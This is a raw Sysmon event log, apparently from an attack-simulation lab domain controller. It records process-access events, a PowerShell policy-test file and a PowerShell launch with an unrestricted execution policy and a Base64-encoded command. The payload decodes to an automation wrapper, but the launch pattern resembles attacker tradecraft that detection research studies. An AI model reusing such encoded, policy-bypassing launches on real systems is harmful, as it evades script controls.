13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8579-5FCF-9300-000000009101}4132C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.592{10ACEC4A-8579-5FCF-9200-000000009101}43364444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8579-5FCF-9300-000000009101}4132C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|UNKNOWN(00007FF866DB258B)|UNKNOWN(00007FF866253195)|UNKNOWN(00007FF866252E66)|UNKNOWN(00007FF866D0474B)|UNKNOWN(00007FF8662139FC)|UNKNOWN(00007FF866271ECB)|UNKNOWN(00007FF866255530)|UNKNOWN(00007FF866255530)|UNKNOWN(00007FF8662553C1)|UNKNOWN(00007FF866247346)|UNKNOWN(00007FF866253879)|UNKNOWN(00007FF86625346C)|UNKNOWN(00007FF866253195)|UNKNOWN(00007FF866252E66)|UNKNOWN(00007FF866D0474B)|UNKNOWN(00007FF866239CC7)|UNKNOWN(00007FF866239297) 154100x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.593{10ACEC4A-8579-5FCF-9300-000000009101}4132C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.576{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.576{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.576{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.514{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.514{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.482{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vrsji3af.1dt.ps12020-12-08 13:54:01.482 10341000x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.467{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.451{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.435{10ACEC4A-8579-5FCF-9100-000000009101}41724316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66722519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc3123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65bc2df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+666746d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b8398a